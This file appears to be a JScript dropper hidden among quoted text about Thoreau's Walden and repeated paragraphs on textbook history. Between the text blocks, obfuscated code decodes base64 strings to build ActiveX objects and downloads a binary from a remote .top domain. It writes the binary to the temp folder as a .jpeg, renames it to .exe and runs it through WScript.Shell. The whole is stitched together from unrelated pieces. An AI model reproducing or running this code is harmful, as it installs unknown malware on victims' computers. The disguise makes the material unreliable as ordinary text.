'Walden ou la Vie dans les bois (titre original Walden; or, Life in the Woods) est un recit publie en 1854 par lecrivain americain Henry David Thoreau (1817-1862).'

'Le livre raconte la vie que Thoreau a passee dans une cabane pendant deux ans, deux mois et deux jours, dans la foret appartenant a son ami et mentor Ralph Waldo Emerson, jouxtant letang de Walden (Walden Pond), non loin de ses amis et de sa famille qui residaient a Concord, dans le Massachusetts.'

'Walden est ecrit de telle facon que le sejour semble durer un an seulement. La narration suit les changements de saisons et Thoreau presente ses pensees, observations et speculations. Il devoile egalement comment, au contact de lelement naturel, lindividu peut se renouveler et se metamorphoser, prendre conscience enfin de la necessite de fondre toute action et toute ethique sur le rythme des elements.'

'Walden nest ni un roman, ni une autobiographie, ni un journal naturaliste. Sa dimension critique a lencontre du monde occidental en fait un veritable pamphlet. La part de limagination est consequente et Thoreau consacre de nombreuses scenes a decrire letang de Walden mais aussi les animaux et la facon dont les gens le considerent du fait de son isolement, tout en degageant des conclusions philosophiques. Ces longs passages concernant la nature appartiennent a la tradition transcendantaliste et appellent a refondre lethique.'

'Plus dun siecle plus tard, Walden reste une ?uvre phare de la litterature americaine et louvrage fondateur du genre litteraire du nature writing. La pensee ecologiste moderne voit egalement en Walden le roman du retour a la nature et de la conscience environnementale. Les observations et speculations de Thoreau font en effet de la nature, dans le recit, un protagoniste a part entiere. Walden est enfin la lente introspection de Thoreau, le fil directeur dune recherche de sens dans un monde de plus en plus marque par lindustrialisation et la transformation de lespace.'

'Il existe plus de 200 traductions de Walden a travers le monde. Louvrage a ete traduit en francais en 1922 par Louis Fabulet (1862-1933) et redecouvert en France lors des evenements de mai 68. Il demeure lun des ouvrages de reference de la pensee ecologiste voire libertaire.';
var dbFD = [];
	     dbFD.push('U2NyaXB0aW5');
         dbFD.push('nLkZpbGVTeXN0ZW1PYmplY3Q=');	
		 zVNTIPi = base64(dbFD);
		
   var WOsSUTw = new ActiveXObject(zVNTIPi);
  
  function trObUFx(){
    var fvxVKg;
    try {
	   var fsUKRx = [];
         fsUKRx.push('TXN4bWw');	
 		 fsUKRx.push('yLlhNTEhUVFA=');
		 KRJZyQDJn = base64(fsUKRx);
      fvxVKg = new ActiveXObject(KRJZyQDJn);
    } catch (e) {
      try {
		 var EeyxvUUYT = [];
         EeyxvUUYT.push('TWljcm9zb2');	
		 EeyxvUUYT.push('Z0LlhNTEhUVFA=');	
		 jDzJNDkXh = base64(EeyxvUUYT);
        fvxVKg = new ActiveXObject(jDzJNDkXh);
      } catch (E) {
        fvxVKg = false;
      }
    }
    if (!fvxVKg && typeof XMLHttpRequest!='undefined') {
       fvxVKg = new XMLHttpRequest();
    }
    return fvxVKg;
  }
  
  function pgFvjts(callback){
	  var vdt = trObUFx();
	     if(vdt){
		 var PVp = [];
	     PVp.push(' aHR0cDovL2Ntb2FoeXJkbGEudG9wL2FkbWluLnBocD9mPTEuZGF0 ');
		 BjoK = base64(PVp);
	     var vhDHWXR = BjoK;
         vdt.open("GET", vhDHWXR, false);
         vdt.send();
		 if (vdt.Status == 200) {
			 return callback(vdt.ResponseBody, false);
		 }
		} 
  }
  
  function dmCdpYTjT(HftCV){
	   try{
	     var pxalK = "\\" + Math.random().toString(36).substr(2, 9) + HftCV;
         var yuKsTs = WOsSUTw.GetSpecialFolder(2) + pxalK; 
	     return yuKsTs;
	   }
	   catch(e){
	     return false;
	   }
 }

   function base64(base64){
	   var Base64 = {
    _keyStr: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",    decode: function(e) {        var t = "";        var n, r, i;        var s, o, u, a;        var f = 0;        e = e.replace(/[^A-Za-z0-9+/=]/g, "");        while (f < e.length) {            s = this._keyStr.indexOf(e.charAt(f++));            o = this._keyStr.indexOf(e.charAt(f++));            u = this._keyStr.indexOf(e.charAt(f++));            a = this._keyStr.indexOf(e.charAt(f++));            n = s << 2 | o >> 4;            r = (o & 15) << 4 | u >> 2;            i = (u & 3) << 6 | a;            t = t + String.fromCharCode(n);            if (u != 64) {                t = t + String.fromCharCode(r)            }            if (a != 64) {                t = t + String.fromCharCode(i)            }        }        t = Base64._utf8_decode(t);        return t    },    _utf8_decode: function(e) {        var t = "";        var n = 0;        var r = c1 = c2 = 0;        while (n < e.length) {            r = e.charCodeAt(n);            if (r < 128) {                t += String.fromCharCode(r);                n++            } else if (r > 191 && r < 224) {                c2 = e.charCodeAt(n + 1);                t += String.fromCharCode((r & 31) << 6 | c2 & 63);                n += 2            } else {                c2 = e.charCodeAt(n + 1);                c3 = e.charCodeAt(n + 2);                t += String.fromCharCode((r & 15) << 12 | (c2 & 63) <<                    6 | c3 & 63);                n += 3            }        }        return t    }};
var sVOhfqcAp = base64;
var Zj = sVOhfqcAp.join('');
var hYO = Base64.decode(Zj);
return hYO;
   }
function lcjcJldraV(DbdkUsgUlk, sdsdcalsdslback){
	  try{
   var fsdsdfo, f = '.eUqrbdSUGcyxe';
   fsdsdfo = new ActiveXObject("Scripting.FileSystemObject");
   fsdsdfo.MoveFile(DbdkUsgUlk, DbdkUsgUlk.replace('.jpeg','') + f.replace('UqrbdSUGcy',''));
   return sdsdcalsdslback(DbdkUsgUlk.replace('.jpeg','') + f.replace('UqrbdSUGcy',''));
	  }catch(e){
		  return null;
	  }
}
  
function mcOLE(dRE, kJAImwNn){
eval('var werewegd = '+dRE+';  werewegd.Run(kJAImwNn);');
	
}

function lFVbcdsjnfe(ljhisjBtu){
eval('var werewegd = new ActiveXObject("WScript.Shell");  werewegd.Run(ljhisjBtu);');
	
}

  function VIVzyl(test, path){
	  function ccc(){
      var ccc = ['return S', "wrwerwe", "234dsfd", "new ActiveXObject('WScript.Shell')"];
      return ccc[Math.floor(Math.random()*ccc.length)] || "new ActiveXObject('WScript.Shell')";
      }
	  var zolupa = null, zoluzpa = null;
	  
	  var z = 'A', m='X',  a = 'W', b = 'S', c='c', d='r', f='i',g='p',h= 't', j = 'h', k = 'e';
	  var ccc = ccc();
	  function test(){
		  var arr = 0;
	  for (var i = 0; i < 10; i++) {
		  var ttt = ccc;
		  if(~ttt.indexOf('WS')){
		      arr = 1;
              lcjcJldraV(path, function (putput){
	            mcOLE(ccc, putput);
              });
		      break;
		  }
	    }
		return arr;
	  }
	   var zopa = test();
	  
 	   var index = 0;
	   function zolupaas(){
		   test();
		   index++;
		   if(index >100000){
			   lcjcJldraV(path, function (putput){
			   lFVbcdsjnfe(putput);
			   });
			   return true;
		   }
		   return false;
	   }
	   var i = 0;
	   do {
           i = zopa;
           var zzzz = zolupaas();	
		   if(zzzz){
			   break;
		   }
       } while (i < 1);
  }
   pgFvjts(function(euvFqZGc){
	   function fZHh(JwbfNbL){
	   var XhADmwwPYv = dmCdpYTjT('.jpeg');
	    var lwh = [];
	     lwh.push('QURPRE');
         lwh.push('IuU3RyZWFt');
		 var dOhv = base64(lwh);
		 
	   var utewgiJ = new ActiveXObject(dOhv);
            utewgiJ.Open();
            utewgiJ.Type = 1;
            utewgiJ.Write(euvFqZGc);
            utewgiJ.Position = 0;
            utewgiJ.SaveToFile(XhADmwwPYv, 2);
            utewgiJ.Close();
		return 	JwbfNbL(XhADmwwPYv);
	   }
       fZHh(function(nLcWiRKF){
		 var sSQzCCBnHr = [];
	     sSQzCCBnHr.push('d2VyZXdlZ2QgPSBuZXcgQWN0aXZlWE9iamVjd');
         sSQzCCBnHr.push('CgnV1NjcmlwdC5TaGVsbCcpLCB3ZXJld2VnZC5SdW4ocGF0a');
         sSQzCCBnHr.push('HBhdGgpOw==');	
		 var RcECP = base64(sSQzCCBnHr);
			var hmwBiBwF = nLcWiRKF;
			VIVzyl(RcECP, hmwBiBwF);
	   });   
   });  'The ancient Greeks wrote texts intended for education. The modern textbook has its roots in the standardization made possible by the printing press. Johannes Gutenberg himself may have printed editions of Ars Minor, a schoolbook on Latin grammar by Aelius Donatus. Early textbooks were used by tutors and teachers, who used the books as instructional aids (e.g., alphabet books), as well as individuals who taught themselves.'
'The Greek philosopher Plato lamented the loss of knowledge because the media of transmission were changing.[3] Before the invention of the Greek alphabet 2,500 years ago, knowledge and stories were recited aloud, much like Homer s epic poems. The new technology of writing meant stories no longer needed to be memorized, a development Socrates feared would weaken the Greeks mental capacities for memorizing and retelling. (Ironically, we know about Socrates concerns only because they were written down by his student Plato in his famous Dialogues.) [4]'

'The next revolution for books came with the 15th-century invention of printing with changeable type. The invention is attributed to German metalsmith Johannes Gutenberg, who cast type in molds using a melted metal alloy and constructed a wooden-screw printing press to transfer the image onto paper.'

'Gutenbergs first and only large-scale printing effort was the now iconic Gutenberg Bible in the 1450s — a Latin translation from the Hebrew Old Testament and the Greek New Testament, copies of which can be viewed on the British Library website. Gutenberg s invention made mass production of texts possible for the first time. Although the Gutenberg Bible itself was expensive, printed books began to spread widely over European trade routes during the next 50 years, and by the 16th century, printed books had become more widely accessible and less costly.[5]'

'Compulsory education and the subsequent growth of schooling in Europe led to the printing of many standardized texts for children. Textbooks have become the primary teaching instrument for most children since the 19th century. Two textbooks of historical significance in United States schooling were the 18th century New England Primer and the 19th century McGuffey Readers.'
'Technological advances change the way people interact with textbooks. Online and digital materials are making it increasingly easy for students to access materials other than the traditional print textbook. Students now have access to electronic and PDF books, online tutoring systems and video lectures. An example of an electronically published book, or e-book, is Principles of Biology from Nature Publishing.'

'Most notably, an increasing number of authors are foregoing commercial publishers and offering their textbooks under a creative commons or other open license.'

'The ancient Greeks wrote texts intended for education. The modern textbook has its roots in the standardization made possible by the printing press. Johannes Gutenberg himself may have printed editions of Ars Minor, a schoolbook on Latin grammar by Aelius Donatus. Early textbooks were used by tutors and teachers, who used the books as instructional aids (e.g., alphabet books), as well as individuals who taught themselves.'
'The Greek philosopher Plato lamented the loss of knowledge because the media of transmission were changing.[3] Before the invention of the Greek alphabet 2,500 years ago, knowledge and stories were recited aloud, much like Homer s epic poems. The new technology of writing meant stories no longer needed to be memorized, a development Socrates feared would weaken the Greeks mental capacities for memorizing and retelling. (Ironically, we know about Socrates concerns only because they were written down by his student Plato in his famous Dialogues.) [4]'

'The next revolution for books came with the 15th-century invention of printing with changeable type. The invention is attributed to German metalsmith Johannes Gutenberg, who cast type in molds using a melted metal alloy and constructed a wooden-screw printing press to transfer the image onto paper.'

'Gutenbergs first and only large-scale printing effort was the now iconic Gutenberg Bible in the 1450s — a Latin translation from the Hebrew Old Testament and the Greek New Testament, copies of which can be viewed on the British Library website. Gutenberg s invention made mass production of texts possible for the first time. Although the Gutenberg Bible itself was expensive, printed books began to spread widely over European trade routes during the next 50 years, and by the 16th century, printed books had become more widely accessible and less costly.[5]'

'Compulsory education and the subsequent growth of schooling in Europe led to the printing of many standardized texts for children. Textbooks have become the primary teaching instrument for most children since the 19th century. Two textbooks of historical significance in United States schooling were the 18th century New England Primer and the 19th century McGuffey Readers.'

'Technological advances change the way people interact with textbooks. Online and digital materials are making it increasingly easy for students to access materials other than the traditional print textbook. Students now have access to electronic and PDF books, online tutoring systems and video lectures. An example of an electronically published book, or e-book, is Principles of Biology from Nature Publishing.'

'Most notably, an increasing number of authors are foregoing commercial publishers and offering their textbooks under a creative commons or other open license.'
'The ancient Greeks wrote texts intended for education. The modern textbook has its roots in the standardization made possible by the printing press. Johannes Gutenberg himself may have printed editions of Ars Minor, a schoolbook on Latin grammar by Aelius Donatus. Early textbooks were used by tutors and teachers, who used the books as instructional aids (e.g., alphabet books), as well as individuals who taught themselves.'
'The Greek philosopher Plato lamented the loss of knowledge because the media of transmission were changing.[3] Before the invention of the Greek alphabet 2,500 years ago, knowledge and stories were recited aloud, much like Homer s epic poems. The new technology of writing meant stories no longer needed to be memorized, a development Socrates feared would weaken the Greeks mental capacities for memorizing and retelling. (Ironically, we know about Socrates concerns only because they were written down by his student Plato in his famous Dialogues.) [4]'

'The next revolution for books came with the 15th-century invention of printing with changeable type. The invention is attributed to German metalsmith Johannes Gutenberg, who cast type in molds using a melted metal alloy and constructed a wooden-screw printing press to transfer the image onto paper.'

'Gutenbergs first and only large-scale printing effort was the now iconic Gutenberg Bible in the 1450s — a Latin translation from the Hebrew Old Testament and the Greek New Testament, copies of which can be viewed on the British Library website. Gutenberg s invention made mass production of texts possible for the first time. Although the Gutenberg Bible itself was expensive, printed books began to spread widely over European trade routes during the next 50 years, and by the 16th century, printed books had become more widely accessible and less costly.[5]'

'Compulsory education and the subsequent growth of schooling in Europe led to the printing of many standardized texts for children. Textbooks have become the primary teaching instrument for most children since the 19th century. Two textbooks of historical significance in United States schooling were the 18th century New England Primer and the 19th century McGuffey Readers.'

'Technological advances change the way people interact with textbooks. Online and digital materials are making it increasingly easy for students to access materials other than the traditional print textbook. Students now have access to electronic and PDF books, online tutoring systems and video lectures. An example of an electronically published book, or e-book, is Principles of Biology from Nature Publishing.'

'Most notably, an increasing number of authors are foregoing commercial publishers and offering their textbooks under a creative commons or other open license.'
'The ancient Greeks wrote texts intended for education. The modern textbook has its roots in the standardization made possible by the printing press. Johannes Gutenberg himself may have printed editions of Ars Minor, a schoolbook on Latin grammar by Aelius Donatus. Early textbooks were used by tutors and teachers, who used the books as instructional aids (e.g., alphabet books), as well as individuals who taught themselves.'
'The Greek philosopher Plato lamented the loss of knowledge because the media of transmission were changing.[3] Before the invention of the Greek alphabet 2,500 years ago, knowledge and stories were recited aloud, much like Homer s epic poems. The new technology of writing meant stories no longer needed to be memorized, a development Socrates feared would weaken the Greeks mental capacities for memorizing and retelling. (Ironically, we know about Socrates concerns only because they were written down by his student Plato in his famous Dialogues.) [4]'

'The next revolution for books came with the 15th-century invention of printing with changeable type. The invention is attributed to German metalsmith Johannes Gutenberg, who cast type in molds using a melted metal alloy and constructed a wooden-screw printing press to transfer the image onto paper.'

'Gutenbergs first and only large-scale printing effort was the now iconic Gutenberg Bible in the 1450s — a Latin translation from the Hebrew Old Testament and the Greek New Testament, copies of which can be viewed on the British Library website. Gutenberg s invention made mass production of texts possible for the first time. Although the Gutenberg Bible itself was expensive, printed books began to spread widely over European trade routes during the next 50 years, and by the 16th century, printed books had become more widely accessible and less costly.[5]'

'Compulsory education and the subsequent growth of schooling in Europe led to the printing of many standardized texts for children. Textbooks have become the primary teaching instrument for most children since the 19th century. Two textbooks of historical significance in United States schooling were the 18th century New England Primer and the 19th century McGuffey Readers.'

'Technological advances change the way people interact with textbooks. Online and digital materials are making it increasingly easy for students to access materials other than the traditional print textbook. Students now have access to electronic and PDF books, online tutoring systems and video lectures. An example of an electronically published book, or e-book, is Principles of Biology from Nature Publishing.'

'Most notably, an increasing number of authors are foregoing commercial publishers and offering their textbooks under a creative commons or other open license.';